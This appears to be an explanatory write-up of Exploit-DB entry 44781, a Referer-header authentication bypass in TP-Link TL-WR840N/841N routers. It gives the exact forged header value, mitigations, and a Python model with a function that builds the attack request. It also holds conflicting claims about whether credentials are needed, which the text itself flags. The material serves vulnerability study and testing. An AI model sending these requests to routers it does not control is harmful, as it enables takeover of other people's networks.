EDB-ID 44781 (Exploit Database entry)

EDB-ID is the identifier of an entry in Exploit Database (Exploit-DB), the public archive of exploits and proofs of concept; entry 44781 documents the router flaw described below.

Affected products: TP-Link TL-WR840N and TL-WR841N routers. CVE identifier: CVE-2018-11714. Vulnerability class: authentication bypass in the web management interface.

The weakness recorded in EDB-ID 44781 is not a memory-safety bug but a logic error in the web interface's authentication decision: the firmware treats a value that the client itself supplies in the HTTP request as proof that the user has already logged in. Any host on the network can put that value into a request, so the check separates nothing.

The fix is simple in concept: authorisation must be bound to state the server created (a session it issued after a successful login), never to a header the client controls. Until corrected firmware is installed, every administrative function of an affected router is exposed to any host that can reach its web interface.

An attacker can bypass authentication by manipulating the Referer header in their HTTP request. By setting the header to http://192.168.0.1/mainFrame.htm, the router incorrectly assumes the user is already authenticated and allows them to execute router actions, such as changing settings or viewing sensitive information, without a password.

Mitigations

Install the vendor's fixed firmware for the affected model and hardware version. Until then, keep the web management interface unreachable from untrusted networks: disable remote management over the WAN and do not let untrusted clients onto the LAN or Wi-Fi, because the bypass needs nothing but network reachability to the interface.

The exploit attached to EDB-ID 44781 is small and precise. It is not a memory-corruption sledgehammer but a single, ordinary HTTP request carrying the header value the firmware trusts; nothing has to be crashed, sprayed or brute-forced.

According to TP-Link's official security advisories, an attacker must first possess valid administrator credentials (username and password) to exploit this specific flaw. That statement conflicts with the Exploit-DB description, under which the forged header alone is accepted in place of a login; anyone assessing one of these routers should send the unauthenticated request against the firmware actually installed rather than rely on either claim.

Technical Breakdown of the Exploit

EDB-ID 44781 records a case where the gatekeeper, the authentication check in front of the administrative pages, effectively waved everyone through.

The exploit does not need to predict addresses, redirect the CPU or inject a payload. Because the web interface accepts the expected header value as evidence of an existing login, a plain request that carries it is processed exactly as an administrator's would be, and every action the interface offers, from viewing sensitive information to changing settings, becomes available to the sender without any further user interaction.

Attack vector: remote; any host that can reach the router's web management interface over the network can trigger this, with no user interaction.

The exploit targets the way the router's web server decides whether an incoming administrative request is authorised. Instead of looking up a server-side session created at login, the firmware inspects a header that the client writes, and treats a request whose Referer names the management frame (http://192.168.0.1/mainFrame.htm) as one that must have come from an already authenticated browser. A tester can confirm the condition with two otherwise identical unauthenticated requests for an administrative page, one without the header and one with it: a login redirect or error for the first and a normal page for the second is the signature of the bypass.
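The header check described above and the two-request confirmation test, as an added example that is neither the Exploit-DB proof of concept nor TP-Link's firmware code. It models a simplified web handler: the Referer value and the mainFrame.htm URL are the page's, while the function names, the session store, the 401/200 responses and the sample requests are constructed here for illustration.

```python
# Added illustration, not code from Exploit-DB entry 44781 or from TP-Link
# firmware. It models the flawed authorisation decision the entry describes
# (a client-supplied Referer treated as proof of login) beside a session-bound
# check, and builds the raw probe requests a tester would send. Function
# names, the session store and the sample requests are constructed here.
import secrets
from typing import Dict, Optional, Tuple

# Value the page gives for the trusted Referer.
TRUSTED_REFERER = "http://192.168.0.1/mainFrame.htm"


def parse_cookie_header(value: str) -> Dict[str, str]:
    """Split 'a=1; b=2' into {'a': '1', 'b': '2'}; malformed pairs are ignored."""
    cookies: Dict[str, str] = {}
    for part in value.split(";"):
        name, sep, val = part.strip().partition("=")
        if sep and name:
            cookies[name] = val
    return cookies


def is_authenticated_vulnerable(headers: Dict[str, str]) -> bool:
    """Flawed check: whoever sends the expected Referer is 'logged in'.
    The header is chosen by the client, so it proves nothing."""
    return headers.get("Referer") == TRUSTED_REFERER


class SessionStore:
    """Server-side record of logins; only tokens issued here are valid."""

    def __init__(self, username: str, password: str) -> None:
        self._credentials = (username, password)
        self._tokens: set = set()

    def login(self, username: str, password: str) -> Optional[str]:
        # A real device should compare with secrets.compare_digest; a tuple
        # comparison keeps this toy short.
        if (username, password) != self._credentials:
            return None
        token = secrets.token_hex(16)
        self._tokens.add(token)
        return token

    def is_valid(self, token: str) -> bool:
        return token in self._tokens


def is_authenticated_fixed(headers: Dict[str, str], store: SessionStore) -> bool:
    """Hardened check: authorisation is bound to a server-issued session cookie;
    the Referer header is ignored entirely."""
    cookies = parse_cookie_header(headers.get("Cookie", ""))
    return store.is_valid(cookies.get("session", ""))


def handle_admin_request(authenticated: bool) -> Tuple[int, str]:
    """Mimic the web interface: 200 with settings when authenticated, 401 otherwise."""
    if authenticated:
        return 200, "wan_password=<redacted>; dhcp_enabled=1"
    return 401, "login required"


def build_probe(host: str, path: str, forge_referer: bool) -> bytes:
    """Raw HTTP/1.1 request a tester sends once without and once with the
    forged Referer; a 401-then-200 pair across the two is the bypass signature."""
    lines = [f"GET {path} HTTP/1.1", f"Host: {host}", "Connection: close"]
    if forge_referer:
        lines.append(f"Referer: {TRUSTED_REFERER}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


def demo() -> Dict[str, int]:
    """Run the same unauthenticated, Referer-forging request through both checks."""
    forged = {"Host": "192.168.0.1", "Referer": TRUSTED_REFERER}  # no cookie, no password
    store = SessionStore("admin", "correct-horse")  # constructed credentials
    results = {
        "vulnerable_forged": handle_admin_request(is_authenticated_vulnerable(forged))[0],
        "fixed_forged": handle_admin_request(is_authenticated_fixed(forged, store))[0],
    }
    token = store.login("admin", "correct-horse")
    legit = {"Host": "192.168.0.1", "Cookie": f"session={token}"}
    results["fixed_session"] = handle_admin_request(is_authenticated_fixed(legit, store))[0]
    return results


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{name}: HTTP {status}")
    print(build_probe("192.168.0.1", "/mainFrame.htm", True).decode())
```

The vulnerable check returns 200 for a request that carries nothing but the forged header, while the session-bound check returns 401 for the same request and 200 only once a login has produced a token. The probe builder shows why the flaw is cheap to test for: the only difference between the two requests is one header line.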


Related vendor advisory: TP-Link, "Fix for vulnerabilities of TL-WR740N & TL-WR940N", www.tp-link.com, security advisory updated 09-29-2019 09:42:04 AM. It states that TP-Link is aware of a security flaw in the TL-WR740N and TL-WR940N. Note that it concerns those two models, not the TL-WR840N and TL-WR841N covered by EDB-ID 44781; check the advisory for your exact model and hardware version before treating it as the fix for CVE-2018-11714.
